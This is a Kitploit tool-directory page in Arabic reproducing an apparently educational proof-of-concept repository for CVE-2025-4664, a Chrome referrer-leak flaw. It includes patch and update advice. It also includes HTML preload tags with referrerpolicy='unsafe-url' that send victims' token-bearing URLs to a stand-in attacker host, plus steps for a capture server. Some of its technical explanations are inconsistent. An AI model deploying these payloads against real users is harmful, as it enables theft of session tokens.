Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-4664 | Kitploit
أدوات/GitHubGitHub/speinador/cve-2025-4664
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتالتصيد الاحتياليأمن الويبالتعلم والتعليم
GitHubspeinador/cve-2025-4664

CVE-2025-4664

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔒 ثغرة CVE-2025-4664

إن ثغرة CVE-2025-4664 هي خلل أمني عالي الخطورة تم تحديده في مكوّن Loader في متصفح Google Chrome، في الإصدارات الأقدم من 136.0.7103.113. تتيح هذه المشكلة لمهاجم عن بُعد تسريب بيانات عبر المنشأ (cross-origin) من خلال صفحة HTML مصممة خصيصًا، مما قد يعرض معلومات حساسة مثل رموز الجلسة أو بيانات المصادقة للخطر.


❓ ما هي هذه الثغرة؟

يكمن الخلل في تنفيذ غير ملائم لسياسات الأمان في مكوّن Loader في Chrome. تحديدًا، يفسّر Chrome توجيه referrer-policy داخل ترويسة HTTP Link في طلبات الموارد الفرعية (مثل الصور أو البرامج النصية)، حتى عندما لا تفعل المتصفحات الأخرى ذلك. يمكن للمهاجم استغلال ذلك عن طريق تعيين سياسة أقل تقييدًا، مثل unsafe-url، مما يؤدي إلى تسريب Chrome لعناوين URL كاملة، بما في ذلك المعاملات الحساسة، إلى نطاقات يسيطر عليها المهاجم.


⚠️ التأثير والاستغلال النشط

تم استغلال هذه الثغرة بنشاط في بيئات حقيقية، مما دفع وكالة الأمن السيبراني وأمن البنية التحتية الأمريكية (CISA) إلى إدراجها في كتالوج الثغرات المعروفة والمستغلة (KEV). حددت CISA تاريخ 5 يونيو 2025 كموعد نهائي للوكالات الفيدرالية لتطبيق التصحيحات المناسبة.


🛡️ التخفيف والتوصيات

أصدرت Google تحديثات لتصحيح هذه الثغرة في الإصدارات التالية:

  • 🖥️ ويندوز وماك: 136.0.7103.113/.114
  • 🐧 لينكس: 136.0.7103.113

يُنصح بشدة جميع المستخدمين بتحديث متصفح Chrome إلى أحدث إصدار متاح. للتحقق من التحديث وتطبيقه:

  1. 🔍 افتح Chrome وانقر على قائمة النقاط الثلاث في الزاوية العلوية اليمنى.
  2. ⚙️ اختر "مساعدة" ثم "معلومات Google Chrome".
  3. ⬇️ سيبحث Chrome عن التحديثات تلقائيًا ويقوم بتثبيتها إذا كانت متاحة.
  4. 🔄 بعد التحديث، أعد تشغيل المتصفح لتطبيق التغييرات.

بالإضافة إلى ذلك، يجب على مستخدمي المتصفحات المبنية على Chromium، مثل Microsoft Edge وBrave وOpera وVivaldi، متابعة التحديثات المقابلة، حيث قد تتأثر بهذه الثغرة.

الحفاظ على تحديث المتصفح أمر ضروري للحماية من التهديدات الأمنية النشطة وحماية المعلومات الشخصية.


🕵️‍♂️ كيف يتم الاستغلال؟

تُستغل الثغرة CVE-2025-4664 من خلال التلاعب بالطريقة التي يتعامل بها Google Chrome مع سياسة المرجع (referrer-policy) عند تحميل الموارد الفرعية (مثل الصور والبرامج النصية وغيرها) من روابط HTML.


⚙️ كيف يتم الاستغلال تقنيًا:

  1. 🌐 إنشاء موقع خبيث:
    ينشئ المهاجم موقع ويب يتضمن رابط HTML مثل هذا في ترويسة HTTP الخاصة به:

    root@kitploit:~
    <link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
    
  2. 🔧 التلاعب بـ referrer-policy: في معظم المتصفحات، لا يتم تطبيق سياسة الإحالة هذه في وسم <link> على المورد المُحمَّل. ومع ذلك، يطبّقه Chrome، وهذا هو جوهر المشكلة.

  3. 📤 تسريب الـ Referer: عندما يقوم متصفح الضحية (Chrome) بتحميل المورد من victima.com، يرسل عنوان URL الكامل للموقع المصدر كترويسة Referer، وقد يتضمن ذلك:

  • رموز الجلسة (?token=ABC123)
  • معاملات حساسة (?user=admin&password=1234)
  • عناوين URL خاصة
  1. 🎯 الاستقبال على خادم المهاجم: يمكن للمهاجم وضع وجهة المورد كعنوان URL يخضع لسيطرته، على سبيل المثال:
root@kitploit:~
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">

عندما يصل الضحية إلى هذا المورد، يرسل Chrome عنوان URL الكامل الخاص به كـ Referer إلى خادم المهاجم.

  1. 🕵️ سرقة المعلومات: يسجّل خادم المهاجم ترويسات HTTP، ويحصل على المحتوى الكامل لعنوان URL الخاص بالضحية. قد يشمل ذلك بيانات سرية أو رموز وصول أو حتى عناوين URLs لواجهات برمجة التطبيقات الداخلية.

✔️ الشروط اللازمة لكي يعمل الهجوم:

  • 👤 تستخدم الضحية Google Chrome بدون تصحيح.
  • 🔑 يحتوي موقع الضحية على معلومات حساسة في عنوان URL (مثل رموز المصادقة).
  • 🎣 ينجح المهاجم في جعل متصفح الضحية يحمّل موردًا من نطاقه (على سبيل المثال، عبر التصيد الاحتيالي، أو إعلان خبيث، أو إعادة توجيه).

🧪 مثال عملي للهجوم (مبسّط):

1- يرسل المهاجم إلى الضحية رابطًا إلى:

root@kitploit:~
https://atacante.com/pagina-maliciosa.html
  1. في تلك الصفحة يتم تحميل شيء مثل:
root@kitploit:~
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
  1. يرسل متصفح Chrome:
root@kitploit:~
Referer: https://victima.com/perfil?token=ABC123

إلى نطاق المهاجم، مما يعرّض الرمز.

صورة الملف الشخصي

ملفات المشروع

🖥️ index.html — ملف الضحية

هذا الملف يحاكي ضحية الهجوم، وهو عرض توضيحي مبسّط بصيغة HTML لإظهار كيفية استغلال ثغرة CVE-2025-4664 باستخدام وسم <link> خبيث:

  • يمثل الواجهة الضعيفة.
  • يُستخدم لإظهار كيفية عمل الثغرة في بيئة خاضعة للتحكم.
  • يحتوي على عناصر يمكن للمهاجم استغلالها وفقًا لـ CVE-2025-4664.
root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
  <link rel="preload" as="image"
        href="https://victima.com/perfil?token=ABC123"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
  <p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>

ماذا يفعل هذا الكود:

  • تم إعداد وسم <link> لتحميل صورة مسبقًا من victima.com مع رمز في عنوان URL.
  • مع referrerpolicy="unsafe-url"، سيرسل Chrome عنوان URL الكامل للصفحة الحالية كـ Referer إلى نطاق الضحية.
  • يمكن للمهاجم التقاط عنوان URL الكامل في سجلاته إذا كانت الصورة تشير إلى خادمه الخاص.

🐍 servidor_atacante.py — ملف المهاجم

باستخدام هذا السكربت يمكن أتمتة الهجوم لالتقاط الـ Referer عبر خادم صغير بلغة Python. إليك مثال باستخدام Flask لمحاكاة خادم المهاجم الذي يستقبل البيانات:

  • يحاكي الهجوم ضد الضحية الممثلة في index.html.
  • ينفذ التقنيات الموصوفة في الثغرة.
  • يُستخدم لاختبار والتحقق من التخفيف المُنفَّذ.

كيفية استخدامه:

  1. احفظ هذا الكود باسم servidor_atacante.py.
  2. ثبّت Flask إذا لم يكن لديك:
root@kitploit:~
pip install flask
  1. شغّل الخادم:
root@kitploit:~
python servidor_atacante.py
  1. ثم عدّل ملف HTML التوضيحي كالتالي:
root@kitploit:~
<link rel="preload" as="image"
      href="http://<tu_IP>:8080/captura.jpg"
      referrerpolicy="unsafe-url">

استبدل <tu_IP> بعنوان IP العام أو المحلي للخادم الذي يشغّل السكربت.


💪 كيفية استخدام المشروع

🛠️ 1. تشغيل خادم Flask

  1. افتح طرفية (PowerShell أو CMD).

  2. انتقل إلى مجلد الملف:

root@kitploit:~
cd "C:\Users\Sebas\Desktop\servidor_atacante"
  1. شغّل Flask:
root@kitploit:~
python servidor_atacante.py
  1. سترى شيئًا مثل:
root@kitploit:~
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080

🌐 2. إنشاء وفتح index.html (محاكاة الضحية)

في نفس المجلد (C:\Users\Sebas\Desktop\servidor_atacante)، أنشئ ملفًا باسم index.html بالمحتوى التالي:

root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Simula el ataque -->
  <link rel="preload" as="image"
        href="http://192.168.1.35:8080/captura.jpg"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Simulación CVE-2025-4664</h1>
  <p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>

✅ مهم: تأكد من أن عنوان IP (192.168.1.35) يطابق ما يعرضه Flask كعنوان IP محلي. إذا كان مختلفًا، غيّره في ملف HTML.

🚀 3. فتح index.html بمعامل حساس

  1. افتح Chrome.

  2. في شريط العناوين، اكتب:

root@kitploit:~
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
  1. اضغط Enter.

  2. 📥 مشاهدة النتيجة على الخادم في وحدة تحكم Flask يجب أن ترى شيئًا مثل:

root@kitploit:~
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123

[المجلد الهدف]: قم بتعديل هذا المعامل إلى المكان الذي حفظت فيه الملف.

🎯 هذا يعني أن المتصفح أرسل الـ Referer الكامل إلى المهاجم!


🧑‍🏫 المؤلف

شرح من إعداد Sebastian Peinador لأغراض تعليمية وبحثية في مجال الأمن السيبراني الهجومي.


📄 الترخيص

يتم توزيع هذه المواد بموجب ترخيص MIT.


إذا وجدت هذا مفيدًا، لا تنسَ منح ⭐ للمستودع أو مشاركته!

تنزيل الأداة